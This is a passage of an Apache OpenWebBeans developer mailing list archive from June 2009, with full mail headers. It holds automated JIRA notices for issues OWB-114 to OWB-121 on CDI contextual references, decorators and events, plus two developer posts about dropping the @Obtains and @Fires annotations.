<mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 83659 invoked by uid 99); 20 Jun 2009 12:36:30 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 20 Jun 2009 12:36:30 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 20 Jun 2009 12:36:27 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 90354234C004 for <[email protected]>; Sat, 20 Jun 2009 05:36:07 -0700 (PDT) Message-ID: <921641889.1245501367576.JavaMail.jira@brutus> Date: Sat, 20 Jun 2009 05:36:07 -0700 (PDT) From: "Gurkan Erdogdu (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Created: (OWB-114) Check Contextual Reference Object Return Type MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org Check Contextual Reference Object Return Type --------------------------------------------- Key: OWB-114 URL: https://issues.apache.org/jira/browse/OWB-114 Project: OpenWebBeans Issue Type: Improvement Components: Context and Scopes Affects Versions: M2 Reporter: Gurkan Erdogdu Assignee: Gurkan Erdogdu Fix For: M3 6.5.3. Contextual reference for a bean >From time to time, the container must obtain a contextual reference for a bean and a given bean type of the bean. A con- textual reference implements the given bean type and all bean types of the bean which are Java interfaces. A contextual reference is not, in general, required to implement all concrete bean types of the bean. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Sat Jun 20 12:56:19 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 84818 invoked from network); 20 Jun 2009 12:56:19 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 20 Jun 2009 12:56:19 -0000 Received: (qmail 94809 invoked by uid 500); 20 Jun 2009 12:56:29 -0000 Delivered-To: [email protected] Received: (qmail 94783 invoked by uid 500); 20 Jun 2009 12:56:29 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 94773 invoked by uid 99); 20 Jun 2009 12:56:29 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 20 Jun 2009 12:56:29 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 20 Jun 2009 12:56:27 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 553E8234C004 for <[email protected]>; Sat, 20 Jun 2009 05:56:07 -0700 (PDT) Message-ID: <807076743.1245502567334.JavaMail.jira@brutus> Date: Sat, 20 Jun 2009 05:56:07 -0700 (PDT) From: "Gurkan Erdogdu (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Created: (OWB-115) Contextual Reference Validity MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org Contextual Reference Validity ----------------------------- Key: OWB-115 URL: https://issues.apache.org/jira/browse/OWB-115 Project: OpenWebBeans Issue Type: Task Components: Context and Scopes Affects Versions: M2 Reporter: Gurkan Erdogdu Assignee: Gurkan Erdogdu Fix For: M3 See section 6.5.4 -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Sat Jun 20 13:02:20 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 87736 invoked from network); 20 Jun 2009 13:02:20 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 20 Jun 2009 13:02:20 -0000 Received: (qmail 99780 invoked by uid 500); 20 Jun 2009 13:02:31 -0000 Delivered-To: [email protected] Received: (qmail 99753 invoked by uid 500); 20 Jun 2009 13:02:31 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 99743 invoked by uid 99); 20 Jun 2009 13:02:31 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 20 Jun 2009 13:02:31 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 20 Jun 2009 13:02:28 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 8F000234C004 for <[email protected]>; Sat, 20 Jun 2009 06:02:07 -0700 (PDT) Message-ID: <375182018.1245502927570.JavaMail.jira@brutus> Date: Sat, 20 Jun 2009 06:02:07 -0700 (PDT) From: "Gurkan Erdogdu (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Created: (OWB-116) Update Business Method Definition MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org Update Business Method Definition --------------------------------- Key: OWB-116 URL: https://issues.apache.org/jira/browse/OWB-116 Project: OpenWebBeans Issue Type: Task Components: Lifecycle Affects Versions: M2 Reporter: Gurkan Erdogdu Assignee: Gurkan Erdogdu Fix For: M3 See section, 7.2. Decorator and Interceotor method calls are not activate interceptors and decorators. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Sat Jun 20 13:06:19 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 88265 invoked from network); 20 Jun 2009 13:06:18 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 20 Jun 2009 13:06:18 -0000 Received: (qmail 802 invoked by uid 500); 20 Jun 2009 13:06:30 -0000 Delivered-To: [email protected] Received: (qmail 775 invoked by uid 500); 20 Jun 2009 13:06:30 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 765 invoked by uid 99); 20 Jun 2009 13:06:29 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 20 Jun 2009 13:06:29 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 20 Jun 2009 13:06:27 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 7CC63234C1EA for <[email protected]>; Sat, 20 Jun 2009 06:06:07 -0700 (PDT) Message-ID: <2011282042.1245503167510.JavaMail.jira@brutus> Date: Sat, 20 Jun 2009 06:06:07 -0700 (PDT) From: "Gurkan Erdogdu (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Created: (OWB-118) Supports Decroators for Constrcutor Delegate Injection MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org Supports Decroators for Constrcutor Delegate Injection ------------------------------------------------------ Key: OWB-118 URL: https://issues.apache.org/jira/browse/OWB-118 Project: OpenWebBeans Issue Type: Improvement Components: Interceptor and Decorators Affects Versions: M2 Reporter: Gurkan Erdogdu Assignee: Gurkan Erdogdu Fix For: M3 -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Sat Jun 20 13:06:20 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 88269 invoked from network); 20 Jun 2009 13:06:20 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 20 Jun 2009 13:06:20 -0000 Received: (qmail 848 invoked by uid 500); 20 Jun 2009 13:06:31 -0000 Delivered-To: [email protected] Received: (qmail 820 invoked by uid 500); 20 Jun 2009 13:06:31 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 810 invoked by uid 99); 20 Jun 2009 13:06:31 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 20 Jun 2009 13:06:31 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 20 Jun 2009 13:06:28 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 7449A234C04C for <[email protected]>; Sat, 20 Jun 2009 06:06:07 -0700 (PDT) Message-ID: <2003395861.1245503167475.JavaMail.jira@brutus> Date: Sat, 20 Jun 2009 06:06:07 -0700 (PDT) From: "Gurkan Erdogdu (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Created: (OWB-117) Updates Event For Last Draft MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org Updates Event For Last Draft ---------------------------- Key: OWB-117 URL: https://issues.apache.org/jira/browse/OWB-117 Project: OpenWebBeans Issue Type: Improvement Components: Events Affects Versions: M2 Reporter: Gurkan Erdogdu Assignee: Gurkan Erdogdu Fix For: M3 -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Sat Jun 20 13:08:18 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 88643 invoked from network); 20 Jun 2009 13:08:18 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 20 Jun 2009 13:08:18 -0000 Received: (qmail 1370 invoked by uid 500); 20 Jun 2009 13:08:29 -0000 Delivered-To: [email protected] Received: (qmail 1343 invoked by uid 500); 20 Jun 2009 13:08:29 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 1333 invoked by uid 99); 20 Jun 2009 13:08:29 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 20 Jun 2009 13:08:29 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 20 Jun 2009 13:08:27 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 8D603234C1E7 for <[email protected]>; Sat, 20 Jun 2009 06:08:07 -0700 (PDT) Message-ID: <1501494301.1245503287578.JavaMail.jira@brutus> Date: Sat, 20 Jun 2009 06:08:07 -0700 (PDT) From: "Gurkan Erdogdu (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Updated: (OWB-118) Supports Decorators for Other Delegate Injections In-Reply-To: <2011282042.1245503167510.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/OWB-118?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Gurkan Erdogdu updated OWB-118: ------------------------------- Description: The delegate injection point must be an injected field, initializer method parameter or bean constructor method parameter. If an injection point that is not an injected field, initializer method parameter or bean constructor method parameter is an- notated @Decorates, the container automatically detects the problem and treats it as a definition error, as defined in Sec- tion 12.4, "Problems detected automatically by the container". Summary: Supports Decorators for Other Delegate Injections (was: Supports Decroators for Constrcutor Delegate Injection) > Supports Decorators for Other Delegate Injections > ------------------------------------------------- > > Key: OWB-118 > URL: https://issues.apache.org/jira/browse/OWB-118 > Project: OpenWebBeans > Issue Type: Improvement > Components: Interceptor and Decorators > Affects Versions: M2 > Reporter: Gurkan Erdogdu > Assignee: Gurkan Erdogdu > Fix For: M3 > > > The delegate injection point must be an injected field, initializer method parameter or bean constructor method parameter. > If an injection point that is not an injected field, initializer method parameter or bean constructor method parameter is an- > notated @Decorates, the container automatically detects the problem and treats it as a definition error, as defined in Sec- > tion 12.4, "Problems detected automatically by the container". -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Sat Jun 20 13:08:18 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 88641 invoked from network); 20 Jun 2009 13:08:18 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 20 Jun 2009 13:08:18 -0000 Received: (qmail 1326 invoked by uid 500); 20 Jun 2009 13:08:29 -0000 Delivered-To: [email protected] Received: (qmail 1300 invoked by uid 500); 20 Jun 2009 13:08:29 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 1290 invoked by uid 99); 20 Jun 2009 13:08:29 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 20 Jun 2009 13:08:29 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 20 Jun 2009 13:08:27 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 9560D234C1EC for <[email protected]>; Sat, 20 Jun 2009 06:08:07 -0700 (PDT) Message-ID: <1133354837.1245503287611.JavaMail.jira@brutus> Date: Sat, 20 Jun 2009 06:08:07 -0700 (PDT) From: "Gurkan Erdogdu (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Created: (OWB-119) Cover Chapter11 SPI Implementations MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org Cover Chapter11 SPI Implementations ----------------------------------- Key: OWB-119 URL: https://issues.apache.org/jira/browse/OWB-119 Project: OpenWebBeans Issue Type: Task Components: Core Affects Versions: M2 Reporter: Gurkan Erdogdu Assignee: Gurkan Erdogdu Fix For: M3 -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Sat Jun 20 13:10:21 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 89400 invoked from network); 20 Jun 2009 13:10:21 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 20 Jun 2009 13:10:21 -0000 Received: (qmail 5199 invoked by uid 500); 20 Jun 2009 13:10:31 -0000 Delivered-To: [email protected] Received: (qmail 5184 invoked by uid 500); 20 Jun 2009 13:10:31 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 5174 invoked by uid 99); 20 Jun 2009 13:10:31 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 20 Jun 2009 13:10:31 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 20 Jun 2009 13:10:28 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id B5210234C004 for <[email protected]>; Sat, 20 Jun 2009 06:10:07 -0700 (PDT) Message-ID: <1757203463.1245503407727.JavaMail.jira@brutus> Date: Sat, 20 Jun 2009 06:10:07 -0700 (PDT) From: "Gurkan Erdogdu (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Created: (OWB-120) Implement Chapter12 Initialization Events MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org Implement Chapter12 Initialization Events ----------------------------------------- Key: OWB-120 URL: https://issues.apache.org/jira/browse/OWB-120 Project: OpenWebBeans Issue Type: Task Components: Core Affects Versions: M2 Reporter: Gurkan Erdogdu Assignee: Gurkan Erdogdu Fix For: M3 -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Thu Jun 25 20:57:19 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 27739 invoked from network); 25 Jun 2009 20:57:17 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 25 Jun 2009 20:57:17 -0000 Received: (qmail 71716 invoked by uid 500); 25 Jun 2009 20:56:40 -0000 Delivered-To: [email protected] Received: (qmail 71165 invoked by uid 500); 25 Jun 2009 20:56:39 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 69822 invoked by uid 99); 25 Jun 2009 20:48:31 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 25 Jun 2009 20:48:31 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 25 Jun 2009 20:48:28 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 9D778234C004 for <[email protected]>; Thu, 25 Jun 2009 13:48:07 -0700 (PDT) Message-ID: <1925741974.1245962887630.JavaMail.jira@brutus> Date: Thu, 25 Jun 2009 13:48:07 -0700 (PDT) From: "Mark Struberg (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Created: (OWB-121) remove JMS specific namings from OpenWebBeansPlugin MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org remove JMS specific namings from OpenWebBeansPlugin --------------------------------------------------- Key: OWB-121 URL: https://issues.apache.org/jira/browse/OWB-121 Project: OpenWebBeans Issue Type: Bug Components: Core Affects Versions: M2 Reporter: Mark Struberg Assignee: Mark Struberg Fix For: M3 The OpenWebBeansPlugin should only contain endpoint independent namings. So we should refactor <code>addJMSBean</code> to <code>addImplicitComponentForInjectionPoint</code> -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Thu Jun 25 21:10:21 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 31296 invoked from network); 25 Jun 2009 21:10:21 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 25 Jun 2009 21:10:21 -0000 Received: (qmail 12995 invoked by uid 500); 25 Jun 2009 21:10:32 -0000 Delivered-To: [email protected] Received: (qmail 12979 invoked by uid 500); 25 Jun 2009 21:10:32 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 12969 invoked by uid 99); 25 Jun 2009 21:10:32 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 25 Jun 2009 21:10:32 +0000 X-ASF-Spam-Status: No, hits=3.2 required=10.0 tests=RCVD_IN_BL_SPAMCOP_NET,SPF_NEUTRAL X-Spam-Check-By: apache.org Received-SPF: neutral (athena.apache.org: local policy) Received: from [161.129.204.104] (HELO web27802.mail.ukl.yahoo.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Thu, 25 Jun 2009 21:10:21 +0000 Received: (qmail 50893 invoked by uid 60001); 25 Jun 2009 21:09:59 -0000 DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=yahoo.de; s=s1024; t=1245964199; bh=p5ceNHnbGYVSnMWHgwaScbu2ov/BlTMkwKf85P2oFgg=; h=Message-ID:X-YMail-OSG:Received:X-Mailer:Date:From:Subject:To:MIME-Version:Content-Type:Content-Transfer-Encoding; b=gY99tDafmcVjTMm8Kob/5sDctS2ChgVoFI9eMlBOHHH2UlmvLg5WgKTt/bbJLCxLl8XlzIxHHNo8iXkhZimke8ZkqtKQTsWbC4tmQCyfFhvGNcMSvnd/KTzPjfE6HtkoNAKbUo7fCeXMKuZe2AqELLxoYn6frTAaXtsEjn6I3Ko= DomainKey-Signature:a=rsa-sha1; q=dns; c=nofws; s=s1024; d=yahoo.de; h=Message-ID:X-YMail-OSG:Received:X-Mailer:Date:From:Subject:To:MIME-Version:Content-Type:Content-Transfer-Encoding; b=FZZg7ZI0u26VIbJQpT2jSd/tEBjxRwjMPOEZKsFZZXQiQIC0rN02R6zyHgdfCDXN6NnuSAh+YWO5ont1Qg9e5E+oeel43JO+0ZSfM/u2sZ7pC9oFhkFcOyLUKvbGOaoTlK7PHoulVC9IdjeoKZhQ2wdrCCv7bK8ru1ik+a/AQHI=; Message-ID: <[email protected]> X-YMail-OSG: deVWkBwVM1ksg9xcgBYCPJbJ9WH_t3P.hp4RH6huFvIELiFUVCz97BfIt2Q6RCpNfN0Vd4yVMw.Ia5Yb42X6PHuZTiEChy7OPWVBDCLqOjbMMbGvXcIpp657D2JTHWPOxzmHFu0rgBQSrt6TAsVebDss6CcvFGzWlYjTIunOHui2RMx210AIjH7v3ctuyxf8I.wnjDGKjzXzco7DutP2wpMyEH4oHKO4o3rdLHMOmFb773sO5rrNrGaF1bqUuLTEykkUSxJMyU9PhvBQKI6peKMudCQfQQIhM0eQSaZ6qm3tlwdArV9PNZQCAqnNIYYq3VM- Received: from [161.129.204.104] by web27802.mail.ukl.yahoo.com via HTTP; Thu, 25 Jun 2009 21:09:59 GMT X-Mailer: YahooMailClassic/5.4.17 YahooMailWebService/0.7.289.15 Date: Thu, 25 Jun 2009 21:09:59 +0000 (GMT) From: Mark Struberg <[email protected]> Subject: javax.inject.Obtains To: [email protected] MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: quoted-printable X-Virus-Checked: Checked by ClamAV on apache.org Hi!=0A=0ASo far I've seen the whole @Obtains has been dropped. =0AI persona= lly think this is a good thing, because one can easily work around this by = actually writing down the realm class instead of annotating it with @Obtain= s 'therealclass' ;)=0A=0ASo I think we can simply slaughter out all the Obt= ains stuff from the API, the DefinitionUtil and others?=0A=0Atxs and LieGru= e,=0Astrub=0A=0A=0A From [email protected] Thu Jun 25 21:17:15 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 34556 invoked from network); 25 Jun 2009 21:17:15 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 25 Jun 2009 21:17:15 -0000 Received: (qmail 25193 invoked by uid 500); 25 Jun 2009 21:17:25 -0000 Delivered-To: [email protected] Received: (qmail 25166 invoked by uid 500); 25 Jun 2009 21:17:25 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 25156 invoked by uid 99); 25 Jun 2009 21:17:25 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 25 Jun 2009 21:17:25 +0000 X-ASF-Spam-Status: No, hits=3.2 required=10.0 tests=RCVD_IN_BL_SPAMCOP_NET,SPF_NEUTRAL X-Spam-Check-By: apache.org Received-SPF: neutral (nike.apache.org: local policy) Received: from [161.129.204.104] (HELO web27804.mail.ukl.yahoo.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Thu, 25 Jun 2009 21:17:13 +0000 Received: (qmail 58057 invoked by uid 60001); 25 Jun 2009 21:16:51 -0000 DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=yahoo.de; s=s1024; t=1245964611; bh=RI9BrmEkUfTgyxv35KGiiRQesyMJqyl30/CuB5w9LmQ=; h=Message-ID:X-YMail-OSG:Received:X-Mailer:Date:From:Subject:To:MIME-Version:Content-Type:Content-Transfer-Encoding; b=YntJBZ4Db5jAp3RZuT36bmz50rF1+ertwKYRfDP79cClzgnTEeRVFlLxyhOsYYnN8aIdrIO3VsvlIe+Pyxg1Vm0gdklNZLutRBy7H9S3jzd3JNmguiPM+OOm5GM+KD0Yf3ARlq1VFqn53jmyZ4NhUEV+6YIQihCAdk6Q7lr8FjQ= DomainKey-Signature:a=rsa-sha1; q=dns; c=nofws; s=s1024; d=yahoo.de; h=Message-ID:X-YMail-OSG:Received:X-Mailer:Date:From:Subject:To:MIME-Version:Content-Type:Content-Transfer-Encoding; b=0kj/kcmEYt2Ap0ydU3P/0ADyefCgp4WCwfRtFBAbKOyLvKz2dhpBBkrDLBdtHeOs70IwfA2tw/j1aRU9QMaLcSl8Pwn4WseTrLbsamDB28J0quVbGpHAyaa14tBteCsyRaF6tzouPnsQ3hOmO7cWgUl9TdgETzlm8qq77WujeA4=; Message-ID: <[email protected]> X-YMail-OSG: xCcrSUEVM1mzAJlj0o5KURa4L9Z2WsVlJxno.0oz6TThq0.Xotb.vWYIPrGqT6AE5CKbkvRpfb3.PwTMt4wPCETKO.OQKJKZu0NQzJawMre4PnvBIx9rXArc1PHh5Ur..xaVjPBUef25hNPZz_QroFFFYpmE.yd0L2dz13i0.vZ3D1vk19RxmSUdPCpd6ynjbzOdef4HkjoMpCD8esTRCFpxtEIkXMUei4jMOMJ9va374s86Vtr8xoBMdGGApapiudMLEiNtbTonSKM7WL_z1..bJTpFu6itY1T7OoLM3sX0xalG5BNRSWKpDx5zYgqwwag- Received: from [161.129.204.104] by web27804.mail.ukl.yahoo.com via HTTP; Thu, 25 Jun 2009 21:16:51 GMT X-Mailer: YahooMailClassic/5.4.17 YahooMailWebService/0.7.289.15 Date: Thu, 25 Jun 2009 21:16:51 +0000 (GMT) From: Mark Struberg <[email protected]> Subject: @Fires is also obsolete To: [email protected] MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: quoted-printable X-Virus-Checked: Checked by ClamAV on apache.org @Fires Event<LoggedInEvent> loggedInEvent;=0A=0Awill get=0A=0A@Any Event<Lo= ggedInEvent> loggedInEvent;=0A=0Aor a special bindingType instead of @Any.= =0A=0A=0ASo we now must not look at the @Fires annotation but have to look = at the Event type.=0A=0AThis makes the handling of a few things a bit diffe= rent in the DefinitionUtil!=0A=0ALieGrue,=0Astrub=0A=0A=0A From [email protected] Fri Jun 26 05:54:35 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 78642 invoked from network); 26 Jun 2009 05:54:35 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 26 Jun 2009 05:54:35 -0000 Received: (qmail 82280 invoked by uid 500); 26 Jun 2009 05:54:46 -0000 